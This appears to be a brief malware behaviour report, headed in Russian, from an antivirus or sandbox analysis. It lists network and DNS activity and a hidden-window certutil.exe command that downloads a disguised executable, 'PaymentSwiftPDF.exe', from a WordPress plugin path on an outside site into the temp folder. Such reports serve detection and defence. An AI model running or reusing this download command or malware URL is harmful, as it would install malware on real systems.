Техническая информация
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://sirajaoloan.com/wp-content/plugins/ubh/PaymentSwiftPDF.exe %TEMP%\0v4a.exe
- 'si###aoloan.com':443
- DNS ASK si###aoloan.com
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://sirajaoloan.com/wp-content/plugins/ubh/PaymentSwiftPDF.exe %TEMP%\0v4a.exe' (со скрытым окном)